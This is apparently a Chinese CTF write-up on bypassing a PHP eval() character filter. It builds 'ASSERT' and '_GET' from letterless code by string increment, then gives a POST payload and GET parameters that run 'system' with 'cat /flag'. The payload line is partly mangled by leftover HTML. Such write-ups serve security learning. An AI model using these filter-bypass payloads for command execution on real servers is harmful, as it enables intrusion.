• PHP自增构造_GET

    源码:

    2. error_reporting(0);
    3. if ($_GET['secret']){
    4.     highlight_file(__FILE__);
    5. }else{
    6.     setcookie("hint", "?secret", time()+3600);
    7. }
    8. if (isset($_POST['hh'])) {
    9.     $hh = $_POST['hh'];
    10.     if (is_string($hh) || strlen($hh) <= 107) {
    11.         if (!preg_match("/[!@#%^&*:'\"|`a-zB-Z~\\\\]|[2-5]/",$hh)){
    12.             eval($hh);
    13.         }else{
    14.             echo("no! hacker!!");
    15.         }
    16.     }
    17. } else {
    18.  
    19.     phpinfo();
    20. }

    查看正则匹配还剩的东西:

    2. for($a = 0; $a < 256; $a++){
    3.     if (!preg_match("/[!@#%^&*:'\"|`a-zB-Z~\\\\]|[2-5]/", chr($a))){
    4.         echo chr($a)." ";
    5.     }
    6. }
    7. ?>

    只有 1 6 7 8 9 ; < = > ? A [ ] _ { } 可以用了;

    然后要触发eval() 构造rce 就可以通过PHP自增来实现;什么是PHP自增?

    比如 ‘a’++ =b;'c'++=d;

    这就是自增,那么这道题就可以通过A 的自增来得到我们想要的函数

    另外,在php中,当把字符串和数组连接在一起时,最终返回的值是Array

    2. echo ''.[];
    3.  
    4. //输出 Array

    那么只要取Array中的第一个字母A和第四个字母a,就可以得到A-Z和a-z的所有字母组合。

    2. $_=[];
    3. $_=@"$_"; // $_='Array';
    4. $_=$_['!'=='@']; // $_=$_[0];
    5. $___=$_; // A
    6. $__=$_;
    7. $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
    8. $___.=$__; // S
    9. $___.=$__; // S
    10. $__=$_;
    11. $__++;$__++;$__++;$__++; // E 
    12. $___.=$__;
    13. $__=$_;
    14. $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // R
    15. $___.=$__;
    16. $__=$_;
    17. $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
    18. $___.=$__;
    19.  
    20. $____='_';
    21. $__=$_;
    22. $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // P
    23. $____.=$__;
    24. $__=$_;
    25. $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // O
    26. $____.=$__;
    27. $__=$_;
    28. $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // S
    29. $____.=$__;
    30. $__=$_;
    31. $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
    32. $____.=$__;
    33.  
    34. $_=$$____;
    35. $___($_[_]);  // ASSERT($_POST[_]);

    这里我们采用A来构造_GET

    2. $_='A';
    3. $_++;
    4. $_++;
    5. $_++;
    6. $A=++$_;
    7. $_++;
    8. $A_=++$_;
    9.  
    10. $_=('A'/'A'.'A'){0}; //N
    11. $_++; //O
    12. $_++; //P
    13. $_++; //Q
    14. $_++; //R
    15. $_++; //S
    16. $_='_'.$A_.$A.++$_; //_GET
    17. echo $_;
    18. //($$_{1})($$_{2}); //($_GET{1})($_GET{2})

    post传参

    hh=$_=A;$_++;$_++;$_++;$A=++$_;$_++;$A_=++$_;$_=(A/A.A){0};$_++;$_++;$_++;$_++;$_++;$_=_.$A_.$A.++$_;(

    6)(" role="presentation" style="text-align: center; position: relative;">6)(
    _{7});

     但是要经过URL编码传参;

    然后get传

    secret=6&6=system&7=cat /flag

    和system相同的还有passthru

  • 相关阅读:
    辅助驾驶功能开发-功能规范篇(22)-2-L2级辅助驾驶方案功能规范
    【洁洁送书第七期】现在学 Java 找工作还有优势吗
    浅析DispatchProxy动态代理AOP
    异常处理机制(抛出异常、捕获异常)
    git 忽略已经提交的文件或文件夹 (修改.gitignore文件无效)
    Spring Boot之Spring MVC的工作原理 以及使用eclipse开发Spring MVC的Web应用实战(附源码)
    超级玛丽-c++
    性能监控的革命:Eureka引领分布式服务监控新纪元
    低代码如何扛起未来系统开发的大旗
    【STM32快速上手】点灯只需4步
  • 原文地址:https://blog.csdn.net/qq_58970968/article/details/126215305